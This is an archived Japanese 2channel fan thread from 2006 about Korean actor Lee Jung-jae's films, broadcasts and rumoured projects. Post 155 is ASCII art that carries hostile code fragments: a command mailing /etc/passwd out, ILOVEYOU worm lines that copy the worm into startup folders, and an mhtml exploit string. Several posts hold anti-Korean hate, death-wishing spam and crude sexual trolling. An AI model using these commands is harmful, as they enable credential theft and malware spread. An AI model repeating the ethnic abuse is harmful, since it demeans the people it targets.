2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

イ・ジョンジェについて語りましょう 2

1 :魅せられた名無しさん:2006/05/01(月) 07:18:11
イ・ジョンジェの写真とプロフィールです
http://www.k-plaza.com/star/en_sta_a007.html
こちらは公式サイト
http://www.leejungjae.co.kr/

前スレ
http://tv8.2ch.net/test/read.cgi/celebrity/1065387497/l50


彼の主な出演作品
『イル・マーレ』
『インタビュー』
『ラスト・プレゼント』
『黒水仙』
『情事』
『純愛譜』
『タイフーン』など


2 :魅せられた名無しさん:2006/05/01(月) 08:16:46
誰?

3 :魅せられた名無しさん:2006/05/01(月) 08:46:23
誰?

4 :魅せられた名無しさん:2006/05/01(月) 08:54:25
誰?

5 :魅せられた名無しさん:2006/05/01(月) 09:01:07
誰?

6 :魅せられた名無しさん:2006/05/01(月) 10:56:59
台風見たので飛んで来ますた。

7 :魅せられた名無しさん:2006/05/01(月) 12:47:29
>>1
スレ立てありがdd!

8 :魅せられた名無しさん:2006/05/01(月) 16:15:23
丼ネタに異常に反応する「韓流うんちくババア」にご注意!

前スレの3分の2以上のレスは、そいつが自作自演で書いている
純粋なジョンジェ・ヲタじゃなく、トリビア的な韓流知識を
ひけらかし、悦に入っているイタイ奴
ジョンジェ・スレの主を気取り、丼を批判するなどの自分が気に入らない
レスには粘着してくるしょーもないババアだからw

前スレ...>>528 >>737 >>739をご参考
こういうババアは華麗にスルー汁!!

9 :魅せられた名無しさん:2006/05/01(月) 16:20:12
>>8
アナタ、また来たの?
それらのレスに興奮して反論してた方ですね。
ジョンジェスレを荒らさないで下さいね。

10 :魅せられた名無しさん:2006/05/01(月) 16:28:41
>>1
乙でーす。

11 :魅せられた名無しさん:2006/05/01(月) 17:42:26
新スレマターリしましょ

12 :魅せられた名無しさん:2006/05/01(月) 22:31:12
>>1
乙華麗

13 :魅せられた名無しさん:2006/05/02(火) 20:21:04
1にsage進行いれるまでも無かったぬ・・・orz

14 :魅せられた名無しさん:2006/05/03(水) 00:06:09
粘着の意味について考えちゃったよー。


15 :魅せられた名無しさん:2006/05/03(水) 00:11:58
そっちも乙カレー

16 :魅せられた名無しさん:2006/05/03(水) 00:40:17
ジョンジェもヘンなのに好かれちゃったもんだねえ。
マジメに俳優やってるだけなのに…

17 :魅せられた名無しさん:2006/05/03(水) 00:52:51
ジョンジェの真面目さはかなーりすごいとオモ
俳優業オタクというか、仕事熱心というか…

18 :魅せられた名無しさん:2006/05/03(水) 01:07:27
熱意や努力が空回りしないでちゃんと評価されるとこがスゴイと思う。
今までもこれからも国や時代を代表するようなスーパースターにはならない代わり、
ずっと一線にいてくれそうな安心感がある。バランス感覚がいいんだろうな。


19 :魅せられた名無しさん:2006/05/03(水) 13:25:25
ジョンジェといえばチンポ♪

20 :魅せられた名無しさん:2006/05/03(水) 17:19:05
情事見て本当にいいなぁ〜って思ったよ
インタビュー以降と情事は見たけど、他にオススメありますか?
古い映画はレンタルないかなぁ

21 :魅せられた名無しさん:2006/05/05(金) 15:47:30
本当にsage推奨って入れる必要なかったのが悲しい・・・

22 :魅せられた名無しさん:2006/05/05(金) 16:43:58
何故にチンポ?

23 :魅せられた名無しさん:2006/05/05(金) 17:16:39
反日韓国人スレ
いつまで在日は迷惑も考えずに乱立するつもりなんだろ

24 :魅せられた名無しさん:2006/05/05(金) 21:22:08
今夜はオーブラ観るぞ!

25 :魅せられた名無しさん:2006/05/06(土) 06:21:28
オーブラって何だよw
何でも略すなよ!


ヴァカ?

26 :魅せられた名無しさん:2006/05/07(日) 11:50:10
白夜見たよ〜
最後は可哀想杉・゚・(つД`)・゚・

27 :魅せられた名無しさん:2006/05/07(日) 18:40:45
イルマーレのジョンジェが好き(o^o^o)

28 :魅せられた名無しさん:2006/05/07(日) 19:33:41
顔文字ウザ

29 :魅せられた名無しさん:2006/05/08(月) 10:42:51
「オー!ブラザーズ」いい。
ジョンジェかっこよい。

30 :魅せられた名無しさん:2006/05/10(水) 23:02:56
NHK-BS2
「純愛譜」 5月16日(火)後8:00〜後9:52
「イルマーレ」 5月17日(水)後8:00〜9:37

31 :魅せられた名無しさん:2006/05/12(金) 00:29:16
>>30
すごく楽しみ!!

32 :魅せられた名無しさん:2006/05/12(金) 01:38:49
純愛譜:トイレに落とした配布物を乾かして配りに行くジョンジェが好き
イルマーレ:駅のホームでイヤーマフつけるジョンジェが好き

33 :魅せられた名無しさん:2006/05/12(金) 06:47:39
純愛譜はお風呂でスイカを食べる姿
イルマーレはやっぱ上着の中からタバコに火を付ける姿
ここが好き

34 :魅せられた名無しさん:2006/05/13(土) 13:38:24
純愛譜のダメっぷりはすごい面白いが
ストーリーとしてあの変な男をヒロインが好きになるのが不思議

35 :魅せられた名無しさん:2006/05/13(土) 15:12:08
ヒロイン朝子タンもヘンなコだからお似合いよ

36 :魅せられた名無しさん:2006/05/13(土) 15:49:03
純愛譜ってジョンジェ映画の中でも一番好きな映画かも。
なんかかわいくて。でもキムミニ出てるから、辛くてあんまり見れないなぁ。

37 :魅せられた名無しさん:2006/05/13(土) 16:08:23
1番映画てして好きなのはイルマーレだけど、萌えるのは情事かな

38 :魅せられた名無しさん:2006/05/13(土) 17:46:58
日本人=変はやめて

39 :魅せられた名無しさん:2006/05/13(土) 18:04:54
情事はあのセクシーな身のこなし、視線に萌える。

40 :魅せられた名無しさん:2006/05/14(日) 01:50:35
<大磯男性遺体>同居の女性を殺人容疑で逮捕

神奈川県大磯町高麗1のマンションで11日、同所、会社員、桜本拓也さん(29)の遺体が見つかった事件で、
大磯署捜査本部は13日、桜本さんと同居していた歯科助手、会田美喜容疑者(25)を殺人容疑で逮捕した。
調べでは、会田容疑者は4月30日ごろ、同マンション2階の自宅内で、桜本さんの首を刃物で刺すなどして殺害した疑い。
桜本さんの遺体は首が切断された状態で見つかった。

ttp://headlines.yahoo.co.jp/hl?a=20060513-00000096-mai-soci


顔出し動画
ttp://meta.cdn.yahoo-streaming.jp/cgi-bin/yahoo/news.asx?cid=20060513-00000034-jnn-soci-movie-001&media=wm300k
キャプチャ
ttp://ca.c.yimg.jp/news/1147522687/img.news.yahoo.co.jp/images/20060513/fnn/20060513-00000001-fnn-soci-thumb-000.jpg


41 :魅せられた名無しさん:2006/05/14(日) 02:00:04
地味

42 :魅せられた名無しさん:2006/05/14(日) 02:34:03
台風終わっちゃった
あとはDVD待つだけか

43 :魅せられた名無しさん:2006/05/15(月) 14:36:16
ジョンジェの映画が2本続けて放映ってスゴイよね〜
顔はまぁあれだけど佇まいの綺麗なところを堪能してほしぃなぁ

44 :魅せられた名無しさん:2006/05/15(月) 23:39:36
んHK的にはヨンエ姐さんとのラストプレゼントのほうがよさそう
他局がリメイクしちゃったからだめなのかな

45 :魅せられた名無しさん:2006/05/16(火) 10:40:15
リメイク直前に映画放送もしてたからNHKは無理だったのかなぁ
ヨンエ姐さんのは「春の日は過ぎ行く」をやるしね

46 :魅せられた名無しさん:2006/05/16(火) 21:39:01
日本ではお笑い顔
http://inotch.vis.ne.jp/images/sumita.jpg

47 :魅せられた名無しさん:2006/05/16(火) 22:02:54
顔は・・・だがスタイルがいいんだよ
まなざしやしぐさにも風情があるから〜
明日のイルマーレみて驚けw

48 :魅せられた名無しさん:2006/05/16(火) 22:33:06
純愛譜、よかった♪

49 :魅せられた名無しさん:2006/05/17(水) 13:13:41
ここにもおいとくね
西瓜ジョンジェ
ttp://captain.jikkyo.org/cat/s/1147778534293.jpg

50 :魅せられた名無しさん:2006/05/17(水) 15:39:42
>>49
dwww

51 :魅せられた名無しさん:2006/05/18(木) 00:37:17
ひさしぶりのイルマーレ、やっぱイイ!
実況でも好評っぽかったし。

52 :魅せられた名無しさん:2006/05/18(木) 10:41:07
イルマーレのDVDを持ってるのについ見てしまった。
やっぱり耳あてジョンジェは素敵でした〜。

53 :魅せられた名無しさん:2006/05/18(木) 17:23:27
こんな知らねー韓国俳優のスレ立てんじゃねーよ
晒しアゲ

54 :魅せられた名無しさん:2006/05/18(木) 17:26:14
強制連行されたという在日朝鮮人は,
その証拠を提出し,かつ以下の質問に答えなさい。

・ 戦後60年間,本国から返還請求がない理由を述べなさい。
・ 戦後60年間,本国に助けを求めなかった理由を述べなさい。
・ 戦後60年間,本国が在日朝鮮人を問題視していない理由を述べなさい。
・ 戦後60年間,自分達で帰国事業を立ち上げなかった理由を述べなさい。
・ 戦後60年間,日本人に対して返還事業を提案しなかった理由を述べなさい。
・ 誰によってどこへ強制連行されたのか?詳細を述べなさい。

証拠の提出と質問に対する回答が無い場合,
在日朝鮮人は「違法入国者」の末裔,もしくは当人であるとみなします。
つまり「犯罪者」であるということです。

55 :魅せられた名無しさん:2006/05/18(木) 17:27:51
工作員必死だなwwでもこんな無名のチョンタレントのクソスレ立てんな馬鹿が

56 :魅せられた名無しさん:2006/05/18(木) 17:36:06
ジョンジェのチンポほど素敵なものはない

57 :魅せられた名無しさん:2006/05/19(金) 01:19:21
嵐が下がってたスレを揚げる日が来ようとは思わなかった
ジョンジェ許してくれw

58 :魅せられた名無しさん:2006/05/19(金) 01:32:28
落ちない程度なら下がってたほうがいいけど…。

59 :魅せられた名無しさん:2006/05/19(金) 15:34:22
だからジョンジェとかいうコイツは誰だっつーの
どうせ在日韓流ババアが一日中張り付いて
一人でこのスレ回してるだけだろ
無名韓タレのスレ乱立させるのはやめろや
海芸板のゴミ!


60 :魅せられた名無しさん:2006/05/19(金) 16:53:16
アメリカのプロモ、行ってるんだよね?

61 :魅せられた名無しさん:2006/05/19(金) 16:59:57
>>59
ピンポン♪

62 :魅せられた名無しさん:2006/05/19(金) 17:00:59
>>60
yahooの写真ニュースに丼だけ出ていた
ジョンジェもちっこくてイイから載せてけれ〜

63 :魅せられた名無しさん:2006/05/19(金) 17:35:12
北韓南韓 死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね死ね

64 :魅せられた名無しさん:2006/05/19(金) 17:55:51
イ・ジョンジェは筋金入りの反日俳優だよ

65 :魅せられた名無しさん:2006/05/19(金) 17:58:03
John J ってランボーだろ。分かる奴いねぇか。

66 :魅せられた名無しさん:2006/05/19(金) 18:01:18
ビシバシステムの住田

67 :魅せられた名無しさん:2006/05/19(金) 19:59:48
>>62
画像じゃないけど、間違いなくLAに居るもよう。

イ・ジョンジェもレッドカーペットを踏むようになって嬉しいという所感を明らかにして
韓半島状況を一番近接するように描き出した '台風'に対するファンの声援を頼んだ.
この日プレミア行事には 82歳になった海外同胞お爺さんがイ・ジョンジェを見るために
劇場にまで尋ねて来て視線を集めたりした.

68 :魅せられた名無しさん:2006/05/19(金) 20:49:54
爺に好かれるジョンジェw

69 :魅せられた名無しさん:2006/05/19(金) 21:01:09
わしも若い頃はジョンジェみたいなモムチャンだったんじゃ by 爺

70 :魅せられた名無しさん:2006/05/20(土) 16:03:36
ジョンジェは爺になっても今と同じ顔だろうね。

71 :魅せられた名無しさん:2006/05/20(土) 16:36:44
体も同じかも。いいわー、モム爺ジョンジェ。

72 :魅せられた名無しさん:2006/05/21(日) 12:55:46
チョンジェ

73 :魅せられた名無しさん:2006/05/27(土) 00:22:47
結局プロモの写真って出なかったのね・・・

74 :魅せられた名無しさん:2006/05/27(土) 04:59:06
韓国のサイトには白っぽい服のジョンジェが出てたような…。
見た記憶はある。どこかは覚えてない。すまん。

75 :魅せられた名無しさん:2006/05/27(土) 14:46:10
確か中央日報に載ってたよ〜

76 :魅せられた名無しさん:2006/05/30(火) 23:41:39
ttp://travel.innolife.net/innoreport/img/item/699_1.jpg
ファントム・エンターテイメントBI宣布式現場
なんでプレーヤーズからファントムに会社名かえたの?

77 :魅せられた名無しさん:2006/06/01(木) 16:41:39
>>76
ジョンジェ・ヲタでもない「韓流オタクババア」は
巣にカエレ!

78 :魅せられた名無しさん:2006/06/01(木) 16:44:35
>>77
・・・・・・またアナタですか。

79 :魅せられた名無しさん:2006/06/01(木) 16:56:15
>>78
びしばしすてむ

80 :魅せられた名無しさん:2006/06/01(木) 20:26:22
>>76
この時のファッソンはふつうにカコイイので安心しました
ネクタイとベルトがおそろなのかな

81 :魅せられた名無しさん:2006/06/03(土) 11:41:42
ジョンジェのチンポイ

82 :魅せられた名無しさん:2006/06/04(日) 02:01:43
マンションCM
ttp://www.sundale.co.kr/main.asp

83 :魅せられた名無しさん:2006/06/04(日) 07:13:01
ジョンジェ、髪の毛短い方が似合うと思うわ。
マンション以外にCMはあるの?

84 :魅せられた名無しさん:2006/06/08(木) 16:55:48
ちんぽキタ━━━━━━(゚∀゚)━━━━━━ !!

85 :魅せられた名無しさん:2006/06/08(木) 18:00:41
次回作は何なのかなぁ?

86 :魅せられた名無しさん:2006/06/08(木) 21:19:36
私も気になる。もうドラマはやらないのかな?

87 :魅せられた名無しさん:2006/06/09(金) 01:03:41
ファントムは日本市場狙いでジョンジェのドラマ復帰を算段中だよ。


88 :魅せられた名無しさん:2006/06/09(金) 06:19:51
「半島を出よ」の映画化ってどうなったの?

89 :魅せられた名無しさん:2006/06/09(金) 13:01:22
進んでるはずだけどジョンジェが出るかは不明
出て欲しくないからピッタリの役が合ったらヤダな

90 :魅せられた名無しさん:2006/06/09(金) 16:46:22
真っ先に名前が挙げられていたから、確定かと思ってたけど、未定なのね。
やっぱりドラマが最有力かな?

91 :魅せられた名無しさん:2006/06/10(土) 01:49:16
>真っ先に名前が挙げられていたから
えっ、ホント? どのへんに載った記事ですか?
主人公は元からビョン想定のキャラなんだよね?


92 :魅せられた名無しさん:2006/06/11(日) 02:23:32
ちんぽキタ━━━━━━(゚∀゚)━━━━━━ !!


93 :魅せられた名無しさん:2006/06/15(木) 11:18:50
キム・ミニ、フランス滞在、留学?って朝鮮日報に出てたけど、
別れてないよねぇ。

94 :魅せられた名無しさん:2006/06/15(木) 12:56:26
躁躁躁躁躁■■▼躁躁躁躁躁躁▼■▼躁躁躁躁躁躁躁躁躁
躁躁躁躁▼■■躁躁躁躁躁躁躁■■▼躁躁躁躁躁躁躁躁躁
躁躁躁▼■■▼躁躁躁躁躁躁▼■■▼▼▼▼■■▼躁躁躁
躁躁躁■■■躁躁▼▼躁躁躁▼■■■■■■■■■▼躁躁
躁▼▼■■▼躁▼■■▼躁▼■■▼▼▼▼▼■■■躁躁躁
▼■■■■▼▼■■▼躁躁▼■■■躁躁躁▼■■▼躁躁躁
▼■■■■▼▼■▼躁躁▼■■▼■▼躁▼■■■躁躁躁躁
躁▼■■■■■■▼躁▼■■▼▼■■▼■■■▼躁躁躁躁
躁躁▼■■■■▼▼躁▼■▼躁躁▼■■■■▼躁躁躁躁躁
躁躁躁▼■■▼▼■▼躁▼躁躁躁躁▼■■■躁躁躁躁躁躁
躁躁躁▼■■躁躁■■▼躁躁躁躁躁▼■■▼▼躁躁躁躁躁
▼▼▼■■■▼■■■■▼躁躁▼▼■■■■■▼躁躁躁躁
■■■■■■■■▼■■▼▼■■■■▼■■■■■■▼▼
■■▼▼▼■■躁躁▼▼■■■■▼▼躁躁▼■■■■■▼
▼▼▼躁躁■■躁▼▼▼■■■▼▼■▼▼▼▼■■■■▼
躁■■■▼■■▼■■▼■■▼躁▼■■■■▼▼▼▼▼躁
躁■■■▼■■▼■■▼▼▼躁躁▼■■■■■■▼躁躁躁
躁■■■▼■■躁▼■■躁躁躁躁躁▼▼■■■■▼躁躁躁
▼■■■躁■■躁▼■■▼躁躁▼躁躁躁▼■■▼躁躁躁躁
▼■■■躁■■躁躁■■▼躁▼■■▼▼▼躁躁躁躁躁躁躁
▼■■▼躁■■躁躁■■▼躁▼■■■■■▼▼躁躁躁躁躁
▼■■▼躁■■躁躁▼▼躁躁▼■■■■■■■■▼▼躁躁
▼■■▼躁■■躁躁躁躁躁躁躁▼▼■■■■■■■▼躁躁
躁躁躁躁躁■■躁躁躁躁躁躁躁躁躁躁▼■■■■■▼躁躁


95 :魅せられた名無しさん:2006/06/15(木) 13:19:52
ジョンジェもアート好きだからたびたび行くんじゃない?
あの国の人って1か月でも留学っていうみたいだし、
そう長期ではないんじゃなかろーか。

96 :魅せられた名無しさん:2006/06/15(木) 14:02:15
隣国サカー観戦にも行ってそう

97 :魅せられた名無しさん:2006/06/15(木) 15:45:02
459:壁に耳あり、障子にメアリーさん :2006/06/15(木) 15:31:10 [sage]
イ・ジョンジェ
ロンドンで雑誌撮影を一緒にした.イ・ジョンジェはあんまり服を装って
感覚がすぐれた学びなさい作業しやすいスタイルだ.
ロックショリした感じに纎細なマナーが身に体内化されて人を気持ち良くする.
それは元々一瞬に練習して出るのではないから.自然に付け出す感じが本当に良い俳優だ.

よほど利口な学ぶ.印象はちょっと硬く見えるのに,それが見にくいよりはよく似合うと思う.
カリスマあるキャラクターがそれでもっとよく似合うようだ.コミックな作品よりは固有の
男性的イメージをよく吹き出すことができる作品にもっとよく似合う.
漂うイメージもそうで俳優としての性向もそうだ.

スタイル里の時する.体形が特別だ.魂が身を鍛えるように,精神と肉体が
一つになった感じとでもしようか.

98 :魅せられた名無しさん:2006/06/15(木) 18:18:21

    ■■■■■■■■
   ■■■■■■■■■                 /"´:;;::;;;: ::::;::"ソヽ
  ■■■■√ === │               / ,ヘ〜-ー'´⌒``ヽ:ヽ
 ■■■■√ 彡    ミ │             / ノ 彡:三:三:三:ミ |: \
 ■■■√   ━    ━ \            | |. __,,;;ィ  t;;;;,,,_ :ヽ |
 ■■■  ∵   (●  ●)∴│            .| |シ ,ィェァ') (.yェュ、ミ| |
 ■■■    丿■■■(  │            !r、|  ''''''. | | ''''''  Y )
 ■■■     ■ 3 ■  │   ,,;;;------;;,,,   ヽ{ ヽ. (r、 ,n)  /:: };ノ
 ■■■■   ■■ ■■ ■;,,-'''  ::::::    ''ヽ,, し}  : 、___二__., ;:::::jJ
 ■■■■■■■■■■■■;;''  ::::  _   ::: ヽl  .!、.:. ´ ..::::... `ノ::::ノ
 ■■■■■■■■■■■■l  ;;::-'''''  '''''''''';;;;ヽ |  〉、ゝ '""'ノ/  ,〜((((((((〜〜、
  ■■■■■■■■■■■l/ミ  ,,,,,,,   ,,,,,,,  ミ'';; l  /⌒ - -    ( _(((((((((_ )
   ■■■■■■■■■■ lミミ '''  '''; ;'''  ''' ミミ|/ 人 。  。   丿 |/ ~^^\)/^^~ ヽ|
    /⌒        ⌒\    |ミミ -''o'''l l''o''-  ミ|\ \| 亠   / |  _  《 _  ||
   / 人  人    ノ゙\ \  |ミミ   ̄ |  | ̄   ミ| \⊇/干 \ ⊆(|(_//_)-(_//_)- |)
   \ \|  l    // /   lミミ  ,,(;;;;;;_),,   ミl     |     (  |  厶、     |
    \⊇ ノ    ⊆/     |ミミミミ;lii'''''''''''''iil; ミミ|   _/⌒v⌒\  ) | ||||||||||||    |
     (   Y    )        |ミ:ミ:ミミ : ̄: :∪ミミ|⌒\  ノ     ) |  \\_/∪ /
     | _人_, |        |ミミ:ミ::ミ::ミ:::ミミミ|  |  |     |  |      /\~~~~_/⌒ヽ、



99 :魅せられた名無しさん:2006/06/18(日) 03:52:19
某サイトのジョンジェのプロフィール
「家族構成−妻、息子」だとw
い、いつのまに???

100 :ちんぽ大好き:2006/06/18(日) 16:29:31
100

101 :魅せられた名無しさん:2006/06/18(日) 18:05:34
<<99
息子ってわたしもずっと気になってたんですよ!!

102 :魅せられた名無しさん:2006/06/18(日) 19:55:44
>>101
アンカーが逆ですが・・

103 :魅せられた名無しさん:2006/06/19(月) 21:49:47
ミニちゃんってジョンジェの精液飲んだことあるのかな?

104 :魅せられた名無しさん:2006/06/20(火) 18:39:58
白濁液と言いなさい

105 :魅せられた名無しさん:2006/06/20(火) 18:44:51
タイフーンで大鐘賞主演男優賞ノミネートおめ♪

106 :魅せられた名無しさん:2006/06/20(火) 23:17:20
おめこ言うなw

107 :魅せられた名無しさん:2006/06/21(水) 07:30:09
で、ジョンジェはケコーンしてるの?
息子って、本当にいるのか?

108 :魅せられた名無しさん:2006/06/22(木) 00:59:20
>>107は、食糞癖あり。

109 :魅せられた名無しさん:2006/06/22(木) 08:59:50
イルマーレのリメイク、全米4位発進だってさ

110 :魅せられた名無しさん:2006/06/25(日) 01:06:39
>>109
だから何?

111 :魅せられた名無しさん:2006/06/25(日) 17:36:27
>>110
情報はあくまで情報であって、どう扱うかは個々の裁量。
いちいち他人に価値をつけてもらいたがるのは低脳さん♪


112 :魅せられた名無しさん:2006/06/25(日) 18:04:49
(ジョンジェは)2001年末、『去った後の愛』のMVに出演、
七年間密かに付き合ってきた恋人チェ・ヨニと共演。
このビデオがきっかけとなって発覚するも、
堂々と恋人宣言して(特に否定をしなかった)話題となった。
チェ・ヨニは1993年にミス太平洋に選抜されたミス・コリア出身の美女。

ジョンジェ〜、この人とミニちゃん、交際時期がWってませんか〜?

113 :魅せられた名無しさん:2006/06/25(日) 18:38:36
>>112
ソ、ソースきぼん
二股でもいいんだけどさ

114 :魅せられた名無しさん:2006/06/25(日) 19:31:58
韓国映画方面の某有名サイトの俳優名鑑(ジョンジェの項)にありますた。
個人サイトだから貼れないけど覗いたことのある人も多いと思うよ。
Wってるかどうかは「純愛譜」(2001)の撮影時期からの憶測ですんであしからず。

115 :魅せられた名無しさん:2006/06/25(日) 22:00:16
ちんぽキタ━━━━━━(゚∀゚)━━━━━━ !!
ちんぽキタ━━━━━━(゚∀゚)━━━━━━ !!
ちんぽキタ━━━━━━(゚∀゚)━━━━━━ !!
ちんぽキタ━━━━━━(゚∀゚)━━━━━━ !!

116 :魅せられた名無しさん:2006/06/27(火) 00:39:53
>>114
d!
そこ見た事あったけど記憶に残ってなかったみたい…
「純愛譜」の後すぐに付き合いだしたんじゃないみたいな
話をどっかで読んだかも←これも曖昧だけど

117 :魅せられた名無しさん:2006/06/27(火) 06:41:01
純愛譜の後に携帯のCMで共演してるから純愛譜の時からではないのでは

118 :魅せられた名無しさん:2006/06/27(火) 13:29:38
あっそ。

119 :魅せられた名無しさん:2006/06/30(金) 09:04:57
今朝キアヌの新作の話題で韓国版もチラッと紹介された。
チョン・ジヒョン主演だって。
そうなのか?

120 :魅せられた名無しさん:2006/06/30(金) 09:36:46
そうでしょ。
知名度が ジヒョン>>>>>ジョンジェ だし。

121 :魅せられた名無しさん:2006/06/30(金) 14:43:22
ミザンセヌの審査員に来てた写真でてた
普通っぽい服だった

122 :魅せられた名無しさん:2006/07/01(土) 13:52:01
>>121
ショッキングピンクのシャツにくるくるパーマ
おいらの目にはフザけてるようにも見えた
カジュアルだけど普通かどうかはわからない…orz

123 :魅せられた名無しさん:2006/07/01(土) 14:06:05
審査員て去年はビョンもやってたよね
事務所つながりなのかなそれにしてもジョンジェてばオサレさん・・・

124 :魅せられた名無しさん:2006/07/01(土) 14:26:17
韓国のファッソンリーダーですから

125 :魅せられた名無しさん:2006/07/01(土) 19:37:16
ドラマはジウと共演??

126 :魅せられた名無しさん:2006/07/01(土) 19:53:45
記事が上がってきたね

127 :魅せられた名無しさん:2006/07/01(土) 20:50:06
雑でも大騒ぎだよ、相手がジウだからねえ
でも皆がジョンジェに好意的で助かるわ〜

128 :魅せられた名無しさん:2006/07/01(土) 20:54:14
ジウタンドラマなら日本でも早く見られそうだし
情報もたくさんでてくるんじゃないかと期待

129 :魅せられた名無しさん:2006/07/02(日) 00:22:41
ドラマの概要が…
兄弟の葛藤だから「カインとアベル」なんだろうけど
対立する立場の男性二人が一人の女性を慕う、なんて
ん〜〜どっかで聞いたかな〜?デジャヴ?

130 :魅せられた名無しさん:2006/07/02(日) 03:19:11
まだジョンジェがでると決まったワケじゃない!
心を強く持とう!!

131 :魅せられた名無しさん:2006/07/02(日) 06:30:43
事務所がファントム栗事務所だからさ・・・不安

132 :魅せられた名無しさん:2006/07/02(日) 08:29:35
共演相手が誰かとか言う以前にドラマは脚本がガタガタに
なりがちなのが不安。脚本がダメだとせっかく努力して
いい演技しても報われないしなあ

133 :魅せられた名無しさん:2006/07/02(日) 12:37:19
いよいよドラマ?
楽しみにしてまつよ

134 :魅せられた名無しさん:2006/07/02(日) 16:56:56
>>87が言った通りの展開になりつつあるなあ…
ホントにファントムは栗気マンマンなんだね

135 :魅せられた名無しさん:2006/07/02(日) 18:54:45
ドラマはファントムがつくるんじゃなくてジウ中心でそ
ジョンジェが栗たくても顔が無理と雑で言われてたよ

136 :魅せられた名無しさん:2006/07/02(日) 22:25:04
ドラマをつくるのはクァク監督のプロダクションだよ
で、イルボンマネーの集金装置がジウ 
ファントムはこの企画でジョンジェを韓流スターにできれば
あとでいくらでも稼ぐ方法はあると踏んでるんだろう
ビョンの顔で大丈夫ならジョンジェにも可能性はある、ってか…?

137 :魅せられた名無しさん:2006/07/02(日) 23:11:53
>>136
ドラマをつくるのは、クァク監督のプロダクションと
ジウの事務所の制作会社が合同で作るんだよ
だから、新聞記事では
「チェ・ジウがクァク監督と手を取り合って・・・」となってるの

チェ・ジウ(31)がクァク・キョンテク監督と手を取り合い、来年初めにドラマ出演する。


138 :魅せられた名無しさん:2006/07/02(日) 23:14:40
>>136
インソンもサイダスだから
ファントムは口出しできなさそう

139 :魅せられた名無しさん:2006/07/02(日) 23:19:35
>>136
ジョンジェに韓流スターは無理だから心配いらない
いいじゃない
一流の映画俳優なんだから


140 :魅せられた名無しさん:2006/07/02(日) 23:37:46
>>139
禿同

141 :魅せられた名無しさん:2006/07/03(月) 00:00:59
できたらこんなクソ企画への出演自体を避けたいけどねえ

142 :魅せられた名無しさん:2006/07/03(月) 01:49:31
でもジョンジェをたくさん見られるチャンスだとオモ
シナリオや企画を批評するのは難しいから
今のトコ楽しみな気持ちが先行してる

143 :魅せられた名無しさん:2006/07/03(月) 16:42:30
ジョンジェのちんぽ舐めたい

144 :魅せられた名無しさん:2006/07/03(月) 22:19:52
>>143
禿同

145 :魅せられた名無しさん:2006/07/04(火) 03:52:25
せめて事前製作にしてもらえないかな〜だったらまだもう少し
前向きな気持ちになれるんだけど…


146 :魅せられた名無しさん:2006/07/05(水) 00:33:31
大鐘賞格安現地ツァー発見!
・・・チケットだけでは売れないんだね・・・
http://sinsankorea.com/

147 :魅せられた名無しさん:2006/07/06(木) 06:22:56
インソン年末に入隊とあるけど。

148 :魅せられた名無しさん:2006/07/06(木) 07:39:45
事務所が誤報だと即否定してるけど

149 :魅せられた名無しさん:2006/07/06(木) 08:08:18
スレ違いなんだけど

150 :魅せられた名無しさん:2006/07/06(木) 11:14:26
いや共演話がボツるとさあ

151 :魅せられた名無しさん:2006/07/09(日) 12:07:47
あほくさ

152 :魅せられた名無しさん:2006/07/12(水) 08:01:43
>>151じゃあんたが何か良いネタ提供しろや

153 :魅せられた名無しさん:2006/07/12(水) 13:28:28
かまっちゃだめ

154 :魅せられた名無しさん:2006/07/13(木) 03:05:09
IMDbに写真載せてほすい
ttp://www.imdb.com/name/nm0497631/

155 :魅せられた名無しさん:2006/07/16(日) 21:40:25
       kak.hta';ken=wdt'START
イッパイ         ms-its:mhtml:file://c:\
 モッテキタヨ-      cat /etc/passwd | mail nobody@nonexistent.com
      ∧__∧   c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
     ( ´・ω・)   Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
     /ヽ○==○ fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
    /  ||_ If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
    し' ̄(_)) ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_))



156 :魅せられた名無しさん:2006/07/18(火) 17:18:43
イ・ビョンホン「日週刊誌熱愛説報道に法的対応」

李炳憲(イ・ビョンホン)が自分を陰湿に攻撃した日本週刊誌を相手取って法的対応に出る。

李炳憲の所属事務所ファントムエンターテイメントは、最新号を通じて李炳憲が
30代の日本人元スチュワーデスと熱愛中という内容を報道した日本の
女性週刊誌女性セブンに対し「全くの事実無根であり、
名誉毀損で法的責任を問う」と明らかにした。

この記事に対してファントム側は「『李炳憲の女』というタイトルで、過去の李炳憲の
異性関係を悪意で報道した上、仮想の人物を立ててスキャンダルをねつ造した内容」とし
「ひとまず訂正文掲載を要求し、法的対応を通じて処罰と補償を要求する計画」という
立場を見せた。

女性セブンは「ペ・ヨンジュンのファンが自殺騒ぎをした」
「韓国美人は皆、整形手術で作られる」などの記事を通じて
昨年末から代表的な嫌韓メディアといわれるようになった雑誌。

李炳憲のマネージャーソン・ソグ室長は「日本進出初期から女性セブン側のインタビューの
要請を何度も受けてきたが、その性格からメディアを信頼できず、要請をずっと断ってきた。
こうした記事が出たのを見ると、意図的なものとみられる」と話している。

ソン室長はまた「韓流スターたちの日本でのステイタスが上がり、嫌韓を訴える記事もたまに
登場したのであまり気を使わなかったが、今回の件はそのままでは済まないと判断した」
と明らかにした。

李炳憲は日本の公式ホームページを通じて日本のファンに記事が事実ではないことを公開した。
李炳憲は現在、慶北醴泉(キョンブク・イェチョン)で映画『夏の話』を撮影中だ。

2006.07.18 12:45:51
ttp://japanese.joins.com/article/article.php?aid=77939&servcode=700


157 :魅せられた名無しさん:2006/07/19(水) 19:41:38
age

158 :魅せられた名無しさん:2006/07/23(日) 02:27:44
大鐘賞の服はなんか微妙でしたね
つか昨日は誰もここ来てないの?
サビシス

159 ::2006/07/23(日) 10:57:05
頭悪そう。

160 :魅せられた名無しさん:2006/07/23(日) 14:39:35
キアヌ版イル・マーレが秋公開だから
その頃地上波放送ありそうだね

161 :魅せられた名無しさん:2006/07/24(月) 17:08:06
あっそ

162 :魅せられた名無しさん:2006/07/28(金) 13:29:21
